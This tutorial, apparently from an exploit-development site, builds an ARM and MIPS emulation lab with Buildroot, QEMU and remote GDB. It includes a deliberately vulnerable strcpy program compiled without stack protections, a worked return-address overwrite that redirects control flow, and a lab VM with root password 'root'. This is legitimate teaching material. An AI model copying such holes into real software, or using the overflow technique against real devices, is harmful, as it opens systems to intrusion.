Every exploit development tutorial on this site targets x86 or x64. But the majority of devices running in the real world — routers, cameras, industrial controllers, medical equipment — run ARM or MIPS on embedded Linux. If you want to find and exploit vulnerabilities on these targets, you need a lab that doesn’t require buying hardware for every architecture.
This tutorial builds that lab. You’ll configure a minimal ARM Linux system with Buildroot, boot it in QEMU with networking and serial access, cross-compile a vulnerable binary, and attach GDB to debug it remotely — the same workflow you’d use against a real embedded target, but entirely on your x86 workstation.
By the end, you’ll have a reusable environment for exploring ARM exploitation, testing cross-compiled tools, and validating embedded security research.
What each tool does
Before diving in, here’s how the pieces fit together.
┌────────────────────────────────────────────────────┐
│ Your x86 workstation │
│ │
│ ┌─────────────────────────────────────────┐ │
│ │ Build container (podman) │ │
│ │ ┌─────────────┐ ┌──────────────────┐ │ │
│ │ │ Buildroot │─▶│ ARM rootfs + │ │ │
│ │ │ toolchain │ │ kernel (zImage) │ │ │
│ │ └─────────────┘ └───────┬──────────┘ │ │
│ └────────────────────────────┼─────────────┘ │
│ │ volume mount │
│ ┌─────────────┐ ┌──────▼──────────┐ │
│ │ gdb-multiarch│◄────▶│ QEMU ARM VM │ │
│ │ (host) │ TCP │ gdbserver │ │
│ └─────────────┘ :1234│ (target) │ │
│ └─────────────────┘ │
└────────────────────────────────────────────────────┘Buildroot generates the entire embedded system — cross-compilation toolchain, kernel, root filesystem — from a single configuration. It runs inside a container to keep build dependencies off your host. The build artifacts are volume-mounted, so QEMU and GDB access them directly. Buildroot is simpler than Yocto and better suited to security research where you want control, not enterprise packaging.
QEMU emulates the ARM hardware. You boot the Buildroot image in it the same way you’d flash it to a real board.
gdb-multiarch connects from your host to gdbserver running inside the VM, giving you full debugging capability across the architecture boundary.
Installing host dependencies
You need QEMU and GDB on your host machine. The Buildroot toolchain itself runs inside a container, so you don’t need build-essential or cross-compiler packages on the host.
# Debian/Ubuntu
sudo apt install -y qemu-system-arm gdb-multiarch podman
# Arch Linux
sudo pacman -S qemu-system-arm gdb podmanNote
On Arch,
gdbalready supports multiple architectures. On Debian/Ubuntu you need the separategdb-multiarchpackage. The tutorial usesgdb-multiarchin commands — substitutegdbif you’re on Arch. You can substitutedockerforpodmanthroughout — the commands are identical.
Setting up the build container
Buildroot needs a consistent set of host tools (gcc, make, ncurses, etc.) that can conflict with your host system. A container keeps the build environment reproducible and your host clean.
Create a Containerfile in your working directory.
FROM docker.io/library/debian:bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends \
build-essential gcc g++ unzip bc python3 \
libncurses-dev file wget cpio rsync git xz-utils ca-certificates \
&& rm -rf /var/lib/apt/lists/*
RUN useradd -m builder
USER builder
WORKDIR /home/builderBuild the container image.
podman build -t buildroot-env -f Containerfile .Configuring Buildroot
Clone Buildroot on your host and run the configuration inside the container. Mounting the repo as a volume means build artifacts persist between container runs.
git clone https://github.com/buildroot/buildroot.git ~/buildroot
cd ~/buildroot
git checkout 2024.02.x # use a stable release branchStart from the QEMU ARM defconfig and customize it.
podman run --rm -it -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make qemu_arm_versatile_defconfig
podman run --rm -it -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make menuconfigIn the menuconfig interface, change these settings:
Target options
→ Target Architecture: ARM (little endian)
→ Target Architecture Variant: arm926t (keep default for versatilepb compatibility)
Toolchain
→ C library: glibc (musl works too, but glibc matches most real targets)
→ Enable C++ support: YES
→ Build cross gdb for the host: YES
→ GDB debugger Version: latest available
System configuration
→ Root password: root (for serial/SSH login)
→ /dev management: Dynamic using devtmpfs
Target packages → Networking applications
→ dropbear: YES (lightweight SSH server)
Target packages → Debugging, profiling and benchmark
→ gdb → gdbserver: YES (critical — this runs on the target)
→ strace: YES (useful for syscall tracing)
→ ltrace: YES (library call tracing)
Filesystem images
→ ext2/3/4 root filesystem: YES
→ ext2/3/4 variant: ext4
→ exact size: 256M (give yourself room)Save and exit menuconfig. Build the image.
podman run --rm -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make -j$(nproc)Warning
Build time The first Buildroot build compiles the entire toolchain, kernel, and all packages from source. Expect 15–40 minutes depending on your machine. Subsequent builds after config changes are much faster. The build artifacts persist in the mounted
buildroot/directory, so you don’t lose progress when the container exits.
When it finishes, the output lives in output/images/:
ls -lh output/images/zImage # ARM kernel
versatile-pb.dtb # device tree blob
rootfs.ext4 # root filesystem imageBooting in QEMU
Launch the ARM VM with networking and a serial console.
qemu-system-arm \
-M versatilepb \
-m 256M \
-kernel output/images/zImage \
-dtb output/images/versatile-pb.dtb \
-drive file=output/images/rootfs.ext4,if=scsi,format=raw \
-append "root=/dev/sda console=ttyAMA0,115200" \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::1234-:1234 \
-nographicBreaking down the flags:
| Flag | Purpose |
|---|---|
-M versatilepb | Emulate the ARM Versatile PB board |
-m 256M | 256 MB RAM (generous for embedded) |
-kernel / -dtb | Boot directly with kernel + device tree |
-drive | Attach the rootfs as a SCSI disk |
-append | Kernel command line: root device + serial console |
-net user,hostfwd=... | Forward host port 2222 → VM port 22 (SSH), 1234 → 1234 (GDB) |
-nographic | Serial console on your terminal (no GUI window) |
You should see the kernel boot and get a login prompt.
Welcome to Buildroot
buildroot login: root
Password: root
#Verifying the environment
Run a few checks inside the VM.
uname -a
# Linux buildroot 6.1.x #1 SMP ... armv5l GNU/Linux
cat /proc/cpuinfo | head -5
# processor : 0
# model name : ARM926EJ-S rev 5 (v5l)
which gdbserver
# /usr/bin/gdbserver
which strace
# /usr/bin/straceTest SSH from your host in another terminal.
ssh -p 2222 root@localhostLeave the QEMU session running. You’ll work in two terminals from here — one for the VM (or SSH), one for your host.
Cross-compiling a vulnerable binary
Now create a deliberately vulnerable program to debug. This is the same classic stack overflow from the x86 tutorials, but compiled for ARM.
Create vuln.c on your host.
#include <stdio.h>
#include <string.h>
void secret() {
printf("You hijacked control flow on ARM.\n");
}
void vulnerable(char *input) {
char buf[64];
strcpy(buf, input);
printf("You entered: %s\n", buf);
}
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable(argv[1]);
return 0;
}Cross-compile it with the Buildroot toolchain inside the container. Place vuln.c in the buildroot/ directory so it’s visible in the mount.
cp vuln.c ~/buildroot/
podman run --rm -v ~/buildroot:/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
sh -c '
CROSS="$(find output/host/bin -maxdepth 1 -type f -name "*-gcc" | head -1 | sed "s/gcc$//")"
echo "Toolchain prefix: $CROSS"
${CROSS}gcc -o vuln vuln.c \
-fno-stack-protector \
-z execstack \
-no-pie \
-g
'
# Verify it's an ARM binary (back on the host)
file ~/buildroot/vuln
# vuln: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, ...Tip
Keeping debug symbols The
-gflag embeds debug symbols into the binary. You’ll use this copy on the host for GDB. You can optionally strip a separate copy for the target to simulate real-world conditions, but for learning, symbols make everything clearer.
Copy the binary into the VM.
scp -P 2222 ~/buildroot/vuln root@localhost:/root/Remote debugging with GDB
This is the core workflow. Start gdbserver inside the VM, then connect from your host.
On the target (VM)
cd /root
gdbserver :1234 ./vuln AAAAProcess /root/vuln created; pid = 142
Listening on port 1234The program is loaded but paused, waiting for a debugger to attach.
On the host
gdb-multiarch -q ~/buildroot/vulnInside GDB, connect to the remote target and set the architecture.
(gdb) set architecture arm
(gdb) target remote localhost:1234
Remote debugging using localhost:1234
...
(gdb) info registers
r0 0x2 2
r1 0xbefff584 3204446596
...
pc 0x10420 0x10420
cpsr 0x10 16You’re now debugging an ARM binary from your x86 host. Every GDB command works: breakpoints, step, examine memory, backtrace.
Key differences from x86
If you’re coming from the x86 overflow tutorials, ARM has a few critical differences.
| Concept | x86 | ARM |
|---|---|---|
| Return address | On the stack, overwritten via buffer overflow | In the lr (link register), pushed to stack only in non-leaf functions |
| Program counter | eip / rip | pc (r15) |
| Stack pointer | esp / rsp | sp (r13) |
| Calling convention | Arguments on stack (x86) or rdi/rsi/rdx (x64) | Arguments in r0-r3, then stack |
| Instruction alignment | Variable length, no alignment requirement | Fixed 4 bytes (ARM) or 2 bytes (Thumb), must be aligned |
| NX bypass | ROP with ret gadgets | ROP with pop {pc} or bx lr gadgets |
Finding the overflow offset
Set a breakpoint at vulnerable and inspect the stack layout.
(gdb) break vulnerable
(gdb) continue
(gdb) disassemble
Dump of assembler code for function vulnerable:
0x000104a0 <+0>: push {r7, lr}
0x000104a2 <+2>: sub sp, #72
0x000104a4 <+4>: add r7, sp, #0
...The push {r7, lr} at the function prologue saves the link register (return address) and frame pointer onto the stack. This is what you’ll overwrite.
(gdb) # After strcpy returns:
(gdb) x/24wx $sp
0xbefff4c0: 0x41414141 0x41414141 ... ← buf starts here
...
0xbefff504: 0xbefff518 0x000104e0 ← saved r7, saved lrThe buffer is 64 bytes, then 4 bytes of padding, then saved r7, then saved lr. To control pc, you need to overwrite lr - that’s at offset 68 + 4 = 72 from the start of buf.
Check the target address first:
objdump -d ~/buildroot/vuln | grep "<secret>"
# 00010488 <secret>:Because the input comes from argv and is copied with strcpy, payload bytes cannot contain \x00. Instead of writing all 4 bytes of lr, do a partial overwrite of the low 2 bytes. If saved lr is 0x000104e0, writing \x88\x04 changes it to 0x00010488.
On the target:
gdbserver :1234 ./vuln "$(python3 -c "import sys; sys.stdout.buffer.write(b'A'*68 + b'BBBB' + b'\x88\x04')")"Reconnect GDB and continue.
(gdb) target remote localhost:1234
(gdb) continueYou hijacked control flow on ARM.Warning
Thumb mode Many ARM binaries (especially those compiled with
-mthumb) use Thumb instructions. If your target uses Thumb, gadget addresses must have the lowest bit set (address | 1) to switch the processor into Thumb mode. Watch forSIGILLcrashes — they often mean you’re jumping to a Thumb address without the bit set, or vice versa.
Using strace for syscall-level visibility
Before reaching for GDB, strace often tells you what you need to know. It works the same as on x86 but shows ARM syscall numbers.
# Inside the VM
strace -f ./vuln AAAAexecve("./vuln", ["./vuln", "AAAA"], ...) = 0
brk(NULL) = 0x21000
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, ...) = 0xb6fff000
open("/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
...
write(1, "You entered: AAAA\n", 18) = 18
exit_group(0) = ?Filter to specific syscalls for targeted analysis.
# Only show memory-related syscalls
strace -e trace=memory ./vuln AAAA
# Only show network-related syscalls
strace -e trace=network ./some_daemon
# Follow child processes (important for forking daemons)
strace -f -e trace=process ./multi_process_appTip
strace + QEMU = powerful recon When analyzing an embedded binary you don’t have source for, running it under strace in QEMU is often the fastest way to understand its behavior: what files it opens, what network connections it makes, what devices it expects. This is the first step in most firmware analysis workflows.
Automating the workflow
Once you’ve done this manually a few times, script it. Create a run.sh that boots QEMU in the background and waits for SSH.
#!/bin/bash
BUILDROOT=~/buildroot
qemu-system-arm \
-M versatilepb \
-m 256M \
-kernel ${BUILDROOT}/output/images/zImage \
-dtb ${BUILDROOT}/output/images/versatile-pb.dtb \
-drive file=${BUILDROOT}/output/images/rootfs.ext4,if=scsi,format=raw \
-append "root=/dev/sda console=ttyAMA0,115200" \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::1234-:1234 \
-nographic \
-daemonize \
-pidfile /tmp/qemu-arm.pid
echo "Waiting for VM to boot..."
for i in $(seq 1 30); do
ssh -p 2222 -o ConnectTimeout=2 -o StrictHostKeyChecking=no root@localhost true 2>/dev/null && break
sleep 1
done
echo "VM ready. SSH: ssh -p 2222 root@localhost"
echo "To stop: kill \$(cat /tmp/qemu-arm.pid)"And a debug.sh that deploys a binary and starts the debug session.
#!/bin/bash
BINARY=$1
shift || true
if [ -z "$BINARY" ]; then
echo "Usage: $0 <binary> [args...]"
exit 1
fi
# Deploy
scp -P 2222 "$BINARY" root@localhost:/root/
# Start gdbserver on the target
ssh -p 2222 root@localhost "killall gdbserver 2>/dev/null || true"
if [ "$#" -gt 0 ]; then
ssh -p 2222 root@localhost gdbserver :1234 "/root/$(basename "$BINARY")" "$@" &
else
ssh -p 2222 root@localhost gdbserver :1234 "/root/$(basename "$BINARY")" &
fi
sleep 1
# Connect GDB
gdb-multiarch -q "$BINARY" \
-ex "set architecture arm" \
-ex "target remote localhost:1234"chmod +x run.sh debug.sh
./run.sh
./debug.sh ~/buildroot/vuln "AAAA"Adding more architectures
The same workflow applies to other architectures with minimal changes. Here’s what to swap.
| Architecture | Buildroot defconfig | QEMU binary | GDB arch |
|---|---|---|---|
| ARM 32-bit | qemu_arm_versatile_defconfig | qemu-system-arm | arm |
| AArch64 | qemu_aarch64_virt_defconfig | qemu-system-aarch64 | aarch64 |
| MIPS 32-bit | qemu_mips32r2_malta_defconfig | qemu-system-mips | mips |
| MIPS little-endian | qemu_mipsel_malta_defconfig | qemu-system-mipsel | mips |
For MIPS (common in routers):
cd ~/buildroot
podman run --rm -it -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
sh -c 'make qemu_mipsel_malta_defconfig && make menuconfig'
# same changes as before: gdbserver, dropbear, etc.
podman run --rm -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make -j$(nproc)qemu-system-mipsel \
-M malta \
-m 256M \
-kernel output/images/vmlinux \
-drive file=output/images/rootfs.ext4,format=raw \
-append "root=/dev/sda console=ttyS0" \
-net nic \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::1234-:1234 \
-nographicNow you can test exploits against the same architecture as your target device without touching physical hardware. The firmware extraction tutorial covers how to identify the architecture of a real target and bring its binaries into this environment.
Where to go from here
You now have a repeatable cross-architecture lab. Some directions to take it:
- ARM ROP chains — the gadget-finding workflow from the ROP Gadget Hunting Toolkit translates directly; the gadgets just end with
pop {pc}instead ofret - Heap exploitation on ARM — the heap internals differ from x86 glibc; this lab is the right place to study them
- Emulating real firmware — extract a firmware image (next tutorial), mount its rootfs into QEMU using
chroot, and debug the actual binaries - Fuzzing embedded binaries — cross-compile AFL++ with the Buildroot toolchain and fuzz ARM binaries under QEMU user-mode emulation